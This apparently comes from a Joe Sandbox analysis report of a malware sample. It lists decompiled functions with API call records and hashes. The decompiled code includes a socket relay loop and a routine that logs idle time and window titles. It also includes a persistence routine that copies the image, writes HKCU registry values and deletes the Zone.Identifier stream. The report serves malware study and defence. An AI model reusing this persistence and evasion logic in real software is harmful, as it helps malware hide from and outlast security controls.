                                      • Instruction Fuzzy Hash: C8B135719082869FDB15CF18C891FBEBBA5FF55310F2442ADE955AB381C6349E41CFA0
                                      Uniqueness

                                      Uniqueness Score: 2.38%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00CC6F6D,00000000,?,?,00000000,00000000,00CC6F6D,?,00000000,00000000,00CC6F6D,00000001,?,?,00000001,00CC6F6D), ref: 00CC99E2
                                      • MultiByteToWideChar.KERNEL32(00CC6F6D,00000001,?,?,00000000,?), ref: 00CC9A57
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00CC5CCD), ref: 00CC9A69
                                      • __freea.LIBCMT ref: 00CC9A72
                                        • Part of subcall function 00CC6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,00CC852B,00001000,?,?,?,?,00CC3843), ref: 00CC6F11
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                      • String ID:
                                      • API String ID: 573072132-0
                                      • Opcode ID: c2b52d4a9c4e1d82efda02768948905313335acfae32ddb306bf6b4d04e9e5c3
                                      • Instruction ID: b2b8f57268b9425e952780defc85c395491279acedb1afc98ff4b9c11162c31d
                                      • Opcode Fuzzy Hash: c2b52d4a9c4e1d82efda02768948905313335acfae32ddb306bf6b4d04e9e5c3
                                      • Instruction Fuzzy Hash: 1E31AF7190025AABDF209F65DC89FAF7BA9EF44310F15416CF9249B251D7308E51EBA0
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0043D508(void* __ecx, void* __eflags) {
                                      				void* _v8;                              // PSID built below
                                      				short _v12;                             // bytes 4-5 of the SID authority (sits right above _v16)
                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;  // bytes 0-3 of the SID authority
                                      				long _v20;                              // cchReferencedDomainName
                                      				long _v24;                              // cchName
                                      				union _SID_NAME_USE _v28;
                                      				short _v60;                             // referenced domain name buffer (16 WCHARs)
                                      				short _v580;                            // account name buffer (0x104 WCHARs)
                                      				void* _t37;
                                      
                                      				_v20 = 0x10;
                                      				_v8 = 0;
                                      				_t37 = __ecx;
                                      				// Authority {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY, written as a 4-byte zero plus 0x0500
                                      				_v16.Value = 0;
                                      				_v12 = 0x500;
                                      				E00431052( &_v580, 0, 0x208);   // memset-style helper: zero the name buffer
                                      				_v24 = 0x104;
                                      				// Build S-1-5-32-544 (0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS)
                                      				// and resolve it to the localized name of the built-in Administrators group.
                                      				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
                                      					GetLastError();   // error code fetched but discarded
                                      				}
                                      				if(_v8 != 0) {
                                      					FreeSid(_v8);
                                      				}
                                      				E00433412(_t37,  &_v580);   // string-copy helper (lstrlenW/lstrcpyW): store the group name in the object at __ecx
                                      				return _t37;
                                      			}


                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0043B7F2,?,?,00000001), ref: 0043D55D
                                      • LookupAccountSidW.ADVAPI32(00000000,0043B7F2,?,00000104,?,00000010,?), ref: 0043D582
                                      • GetLastError.KERNEL32(?,?,00000001), ref: 0043D58C
                                      • FreeSid.ADVAPI32(0043B7F2,?,?,00000001), ref: 0043D59A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                      • String ID:
                                      • API String ID: 1866703397-0
                                      • Opcode ID: 1ff3772edfe77558ac74a4e7da237eafaf9df68d3f49777b86cad1902e2c3e2f
                                      • Instruction ID: ae107d6f0f6e0c1babc3378600d51704025441d5e0149d21318e1f24ef22453a
                                      • Opcode Fuzzy Hash: 1ff3772edfe77558ac74a4e7da237eafaf9df68d3f49777b86cad1902e2c3e2f
                                      • Instruction Fuzzy Hash: 7011E6B690021DBADB10DFD1DD89AEEB7BCEB08344F40446AF605E2150E7B49A448BA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043D68F(WCHAR** __ecx, intOrPtr* __edx) {
                                      				struct HRSRC__* _t13;
                                      				void* _t14;
                                      				unsigned int _t32;
                                      				intOrPtr* _t35;
                                      				struct HINSTANCE__* _t36;
                                      
                                      				_t35 = __edx;   // output structure
                                      				// Map the file named by *__ecx as a data file only (2 = LOAD_LIBRARY_AS_DATAFILE); no code in it runs.
                                      				_t36 = LoadLibraryExW( *__ecx, 0, 2);
                                      				// The sample tests for -1, but LoadLibraryExW reports failure with NULL, so a failed load
                                      				// falls through to FindResourceW with hModule = 0 (the current process image).
                                      				if(_t36 == 0xffffffff) {
                                      					L4:
                                      					return 0;
                                      				}
                                      				// Resource name 1 of type 0x10 (RT_VERSION)
                                      				_t13 = FindResourceW(_t36, 1, 0x10);
                                      				if(_t13 == 0) {
                                      					goto L4;
                                      				}
                                      				_t14 = LoadResource(_t36, _t13);
                                      				if(_t14 == 0) {
                                      					goto L4;
                                      				}
                                      				// Copy one 32-bit field, two 16-bit fields and four single-bit flags from the resource data
                                      				// into the caller's structure at __edx.
                                      				_t32 =  *(_t14 + 0x28);
                                      				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
                                      				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
                                      				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
                                      				 *(_t35 + 8) = _t32 & 1;
                                      				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
                                      				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
                                      				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
                                      				FreeLibrary(_t36);
                                      				return 1;
                                      			}


                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0043C02B), ref: 0043D69A
                                      • FindResourceW.KERNEL32(00000000,00000001,00000010), ref: 0043D6AE
                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0043C02B), ref: 0043D6BA
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0043C02B), ref: 0043D6FF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadResource$FindFree
                                      • String ID:
                                      • API String ID: 3272429154-0
                                      • Opcode ID: 4af4c89dbb8ce800ae81d067adb8ae99d2a139fdd700a7f25b2fcf42cce500bd
                                      • Instruction ID: 11dfb91c31043533391f8fcc1d5bcf83dcc7211ef3a99a0dc926ecfeb82e6965
                                      • Opcode Fuzzy Hash: 4af4c89dbb8ce800ae81d067adb8ae99d2a139fdd700a7f25b2fcf42cce500bd
                                      • Instruction Fuzzy Hash: 3C01C0B9711A01AFD3088F65AC89A66B7A4FF49310B058239E925C33A0D774D851CBA4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 25%
                                      			E0043D2BD(void* __ecx, void* __edx) {
                                      				signed int _v8;        // bytes pending on the source socket
                                      				char _v2056;           // 0x800-byte relay buffer
                                      				signed int* _t9;
                                      				signed int _t15;
                                      				char* _t16;
                                      				void* _t17;
                                      				void* _t22;
                                      				void* _t23;
                                      
                                      				_v8 = _v8 & 0x00000000;
                                      				_t9 =  &_v8;
                                      				_t23 = __ecx;   // source socket
                                      				_t22 = __edx;   // destination socket
                                      				// WS2_32 ordinal 10 = ioctlsocket; 0x4004667f = FIONREAD (bytes readable without blocking)
                                      				__imp__#10(__ecx, 0x4004667f, _t9);
                                      				if(_t9 == 0xffffffff) {   // SOCKET_ERROR; the 25% decompilation attributes the return value to _t9
                                      					L4:
                                      					return 0;
                                      				}
                                      				if(_v8 == 0) {   // nothing pending: yield briefly and report success
                                      					Sleep(1);
                                      					L7:
                                      					return 1;
                                      				}
                                      				E00431052( &_v2056, 0, 0x800);   // memset-style helper: zero the buffer
                                      				_t15 =  &_v2056;
                                      				__imp__#16(_t23, _t15, 0x800, 0, _t17);   // ordinal 16 = recv(src, buf, 0x800, 0)
                                      				_v8 = _t15;
                                      				if(_t15 == 0) {
                                      					goto L4;
                                      				}
                                      				_t16 =  &_v2056;
                                      				__imp__#19(_t22, _t16, _t15, 0);   // ordinal 19 = send(dst, buf, received, 0)
                                      				if(_t16 > 0) {
                                      					goto L7;
                                      				}
                                      				goto L4;
                                      			}


                                      APIs
                                      • ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0043D2DA
                                      • recv.WS2_32(00000000,?,00000800,00000000), ref: 0043D30E
                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 0043D327
                                      • Sleep.KERNEL32(00000001), ref: 0043D339
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleepioctlsocketrecvsend
                                      • String ID:
                                      • API String ID: 1168213214-0
                                      • Opcode ID: 215c92b921f4120a69030a43f36c7ab48cbae5c2a371c2666334b3f06630295a
                                      • Instruction ID: a2cade29b2996a6fb66cf28084b39332f09f663f746400dd8040a928b7306ff7
                                      • Opcode Fuzzy Hash: 215c92b921f4120a69030a43f36c7ab48cbae5c2a371c2666334b3f06630295a
                                      • Instruction Fuzzy Hash: 3D01D8B5900104BBE7109765AE44FEF32BCFB49311F545072FA05D11C0EBB48E088BAA
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      C-Code - Quality: 82%
                                      			E0043444A(intOrPtr _a4) {
                                      				char _v8;                       // string object holding the window title
                                      				struct tagLASTINPUTINFO _v16;
                                      				signed int _v36;
                                      				char _v40;                      // record type tag
                                      				short _v552;                    // foreground window title (0x100 WCHARs)
                                      				long _t23;                      // idle time in milliseconds (temporary omitted by the decompiler)
                                      				signed int* _t12;               // temporary omitted by the decompiler
                                      
                                      				_v16.cbSize = 8;   // sizeof(LASTINPUTINFO)
                                      				GetLastInputInfo( &_v16);
                                      				_t23 = GetTickCount() - _v16.dwTime;   // milliseconds since the last user input
                                      				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
                                      				E00433412( &_v8,  &_v552);   // string-copy helper (lstrlenW/lstrcpyW)
                                      				_t12 =  &_v36;
                                      				_v36 = _v36 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v40 = 0x15;
                                      				asm("movups [ebp-0x1c], xmm0");
                                      				// Serialize idle seconds (/1000), the millisecond remainder (%1000) and the title into _a4
                                      				E004334A6(E0043358E(E0043356D( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
                                      				E00433492( &_v40);
                                      				E00435A2D(_v8);   // VirtualFree-backed release of the title string
                                      				return _a4;
                                      			}


                                      APIs
                                      • GetLastInputInfo.USER32(?), ref: 0043445F
                                      • GetTickCount.KERNEL32 ref: 00434465
                                      • GetForegroundWindow.USER32 ref: 00434479
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0043448C
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                      • String ID:
                                      • API String ID: 2567647128-0
                                      • Opcode ID: ea22dbbf77577f099fec1f01b000546680cdc8ef845734e7dffba4a1b18ad34f
                                      • Instruction ID: 2a62c229063cece92effcdf6d3a1565001fb55a410d66a22c468ceda55ec7e8a
                                      • Opcode Fuzzy Hash: ea22dbbf77577f099fec1f01b000546680cdc8ef845734e7dffba4a1b18ad34f
                                      • Instruction Fuzzy Hash: 23115E71D00108ABDB04EFA1DE49ADDB7B9EF58305F4041A9B502B6091EBB8AB44CB54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043CCBA(void* __ecx) {
                                      				void* _t14;
                                      				long _t15;
                                      				void** _t26;
                                      				void* _t27;
                                      
                                      				_t27 = __ecx;   // worker object: +4/+8/+0xc/+0x10 handles, +0x14 thread handle, +0x18 thread id
                                      				_t1 = _t27 + 0x14; // 0x446564
                                      				_t26 = _t1;
                                      				if( *_t26 == 0) {   // no worker thread: just release the remaining handles
                                      					L6:
                                      					_t5 = _t27 + 0x10; // 0x446560
                                      					E0043CEBD(_t5);
                                      					_t6 = _t27 + 4; // 0x446554
                                      					E0043CEBD(_t6);
                                      					_t7 = _t27 + 0xc; // 0x44655c
                                      					E0043CEBD(_t7);
                                      					_t8 = _t27 + 8; // 0x446558
                                      					_t14 = E0043CEBD(_t8);
                                      					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;   // clear the stored thread id
                                      					return _t14;
                                      				}
                                      				_t15 = GetCurrentThreadId();
                                      				_t2 = _t27 + 0x18; // 0x0
                                      				if(_t15 ==  *_t2) {   // called from the worker itself: skip the wait
                                      					L5:
                                      					E0043CEBD(_t26);
                                      					goto L6;
                                      				}
                                      				if( *(_t27 + 0x10) == 0) {
                                      					return _t15;
                                      				}
                                      				_t4 = _t27 + 0x10; // 0x0
                                      				SetEvent( *_t4);   // signal the stop event
                                      				// Wait up to 5000 ms (0x1388); on WAIT_TIMEOUT (0x102) kill the thread with exit code -2
                                      				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
                                      					TerminateThread( *_t26, 0xfffffffe);
                                      				}
                                      				goto L5;
                                      			}


                                      APIs
                                      • GetCurrentThreadId.KERNEL32(?,00000000,0043292E,00000000,exit,00000000,start), ref: 0043CCC6
                                      • SetEvent.KERNEL32(00000000), ref: 0043CCDA
                                      • WaitForSingleObject.KERNEL32(00446564,00001388), ref: 0043CCE7
                                      • TerminateThread.KERNEL32(00446564,000000FE), ref: 0043CCF8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                      • String ID:
                                      • API String ID: 2174867186-0
                                      • Opcode ID: 92f308fc24c9bea53582ef35b6539a559295224be89a8291aa8cdd56a4ad45dd
                                      • Instruction ID: b8506c2813da2bbd44fcf57aba897f78acdd7d7f2b2753daf208afb86b66ada2
                                      • Opcode Fuzzy Hash: 92f308fc24c9bea53582ef35b6539a559295224be89a8291aa8cdd56a4ad45dd
                                      • Instruction Fuzzy Hash: D60181340007019BD334AF51D98AAAA77F2FF58311F901A2FF153614F5DBB86988CB48
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CCE226
                                      • GetLastError.KERNEL32(?,00CCDE49,00000000,00000001,00000000,00000000,?,00CCAE2B,00000000,00000000,00000000,00000000,00000000,?,00CCB3AA,00CCD148), ref: 00CCE232
                                        • Part of subcall function 00CCE1F8: CloseHandle.KERNEL32(FFFFFFFE), ref: 00CCE208
                                      • ___initconout.LIBCMT ref: 00CCE242
                                        • Part of subcall function 00CCE1BA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00CCE1CD
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CCE257
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: e4efe7c812980af05d6bcc50fca4858a7fc6cec9d7aad8bc020ee64398d1d34f
                                      • Instruction ID: 36e47afe68c6c716d1d4bcb40b22bbe7ec4633c496a8cabd622550fa81ef186e
                                      • Opcode Fuzzy Hash: e4efe7c812980af05d6bcc50fca4858a7fc6cec9d7aad8bc020ee64398d1d34f
                                      • Instruction Fuzzy Hash: A3F03036002199BFCF622F95EC45F9E3F2AFB4A3A1F044414FA2989131C7328D60EB90
                                      Uniqueness

                                      Uniqueness Score: 0.53%

                                      APIs
                                      • _free.LIBCMT ref: 00CC59D4
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC59E7
                                      • _free.LIBCMT ref: 00CC59F8
                                      • _free.LIBCMT ref: 00CC5A09
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5efe56618d5b9f88bb6258084a8809446b2afd168c76351c581086cc45243356
                                      • Instruction ID: 328d252053b9102fcb2545f7ceea3f5c03bf6af135dfdc586b079670a216298f
                                      • Opcode Fuzzy Hash: 5efe56618d5b9f88bb6258084a8809446b2afd168c76351c581086cc45243356
                                      • Instruction Fuzzy Hash: 04E0EC72812B60BA8A466F54FE45D693F62FB5C714701014BF608B2331CB36067BAFE9
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 95%
                                      			E0043F0C8(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char _a8) {
                                      				// Analyst annotation (comments added to the sandbox's decompilation; statements unchanged):
                                      				// persistence routine. Copies the running image into a special folder chosen by the
                                      				// object in __ecx, registers it under HKCU (0x80000001) and then deletes the
                                      				// :Zone.Identifier stream of the copy. Helper-to-API mapping is taken from the APIs list below.
                                      				WCHAR* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				void* _t49;
                                      				void* _t67;
                                      				int _t91;
                                      				char* _t95;
                                      				intOrPtr* _t131;
                                      				WCHAR** _t135;
                                      				void* _t136;
                                      				void* _t138;
                                      
                                      				_t138 = __eflags;
                                      				_t131 = __ecx;
                                      				E0043D425( &_v8);                                   // GetModuleFileNameW: _v8 = path of the running executable
                                      				_t130 = 0xa;
                                      				_t95 =  &_v20;
                                      				E004332D4(_t95, _t130, _t138);
                                      				_push(_t95);
                                      				_push(_t95);
                                      				_t49 = E0043EF0C(_t131, _t95, _t131 + 0x10);        // RegCreateKeyExW under HKCU with the key name stored at +0x10
                                      				E0043EF4C(_t131);                                   // RegCloseKey
                                      				_t91 = 0;
                                      				if(_t49 == 0) {
                                      					L4:
                                      					_t133 = _t131 + 0x10;
                                      					goto L5;
                                      				} else {
                                      					_t140 = _a4;
                                      					if(_a4 == 0) {
                                      						goto L4;
                                      					} else {
                                      						_t130 =  *((intOrPtr*)(_t131 + 0xc));          // CSIDL of the drop folder, read from the object at +0xc
                                      						_t135 = _t131 + 0x20;
                                      						E00433264(_t135, E0043D75B( &_v12,  *((intOrPtr*)(_t131 + 0xc)), _t140));   // SHGetSpecialFolderPathW, then lstrcpyW into +0x20
                                      						E0043D70F(E00435A2D(_v12), _t135);             // SHCreateDirectoryExW: make sure the drop folder exists
                                      						E0043345A( &_v12, _t131 + 0x4c);               // lstrcpyW: file name taken from +0x4c
                                      						E00433162(E00433297(_t135,  *((intOrPtr*)(_t131 + 0xc)), _t140, "\\"), _t140,  &_v12);   // lstrcatW: <folder>\<name>
                                      						_t123 = _v12;
                                      						E00435A2D(_v12);                               // VirtualFree of the temporary string
                                      						if(CopyFileW(_v8,  *_t135, 0) != 0) {          // copy own image to the drop path; bFailIfExists = 0 overwrites
                                      							_t124 = _t135;
                                      							E0043304E(_t135, _t130, _t136);
                                      							E004354A5(_t131 + 0x30, _t130, _t136);
                                      							E00435C32( &_v16, _t130, _t124, _t124, _t123, _t123);
                                      							_t133 = _t131 + 0x10;
                                      							E0043EFFE(_t131, 0x80000001, _t131 + 0x10, 0xf003f, 0);   // RegCreateKeyExW/RegOpenKeyExW: HKEY_CURRENT_USER, 0xF003F = KEY_ALL_ACCESS
                                      							E0043EFCB(_t131, _t131 + 0x18,  &_v16, 3);                // RegSetValueExW; the trailing 3 is likely dwType REG_BINARY
                                      							E00432E66( &_v16);
                                      							L5:
                                      							if( *_t131 == _t91) {
                                      								E0043EFFE(_t131, 0x80000001, _t133, 0xf003f, _t91);
                                      							}
                                      							if(_a8 == _t91) {
                                      								L13:
                                      								E00433412( &_a4,  *(_t131 + 0x20));                 // _a4 = path of the dropped copy
                                      								E00433162( &_a4, _t146, E00433412( &_a8, L":Zone.Identifier"));   // lstrcatW: "<copy>:Zone.Identifier"
                                      								E00435A2D(_a8);
                                      								DeleteFileW(_a4);                                    // remove the Mark-of-the-Web ADS from the copy
                                      								_t91 = 1;
                                      								E00435A2D(_a4);
                                      							} else {
                                      								if(_a4 == _t91) {
                                      									E00433264(_t131 + 0x20,  &_v8);
                                      								}
                                      								if(E0043EFFE(_t131 + 4,  *((intOrPtr*)(_t131 + 8)), _t131 + 0x14, 0x20006, _t91) != 0) {   // hive from +8, key name from +0x14, 0x20006 = KEY_WRITE
                                      									E0043345A( &_a4, _t131 + 0x54);
                                      									_t67 = E0043EFCB(_t131 + 4,  &_a4, E00432E0A( &_v16, _t130, _t131 + 0x20), 1);   // RegSetValueExW with data built from the drop path; the 1 is likely REG_SZ
                                      									E00435A2D(_a4);
                                      									E00432E66( &_v16);
                                      									_t146 = _t67;
                                      									if(_t67 != 0) {
                                      										E0043EF4C(_t131 + 4);                        // RegCloseKey
                                      										goto L13;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				E00435A2D(_v20);
                                      				E00435A2D(_v8);
                                      				return _t91;                                         // 1 once the copy was written, registered and its ADS removed
                                      			}

                                      0x0043f0c8
                                      0x0043f0d1
                                      0x0043f0d6
                                      0x0043f0dd
                                      0x0043f0de
                                      0x0043f0e1
                                      0x0043f0e6
                                      0x0043f0e7
                                      0x0043f0ef
                                      0x0043f0f8
                                      0x0043f0fd
                                      0x0043f101
                                      0x0043f1c5
                                      0x0043f1c5
                                      0x00000000
                                      0x0043f107
                                      0x0043f107
                                      0x0043f10a
                                      0x00000000
                                      0x0043f110
                                      0x0043f110
                                      0x0043f116
                                      0x0043f121
                                      0x0043f130
                                      0x0043f13c
                                      0x0043f153
                                      0x0043f158
                                      0x0043f15b
                                      0x0043f16e
                                      0x0043f177
                                      0x0043f179
                                      0x0043f184
                                      0x0043f18c
                                      0x0043f194
                                      0x0043f1a5
                                      0x0043f1b6
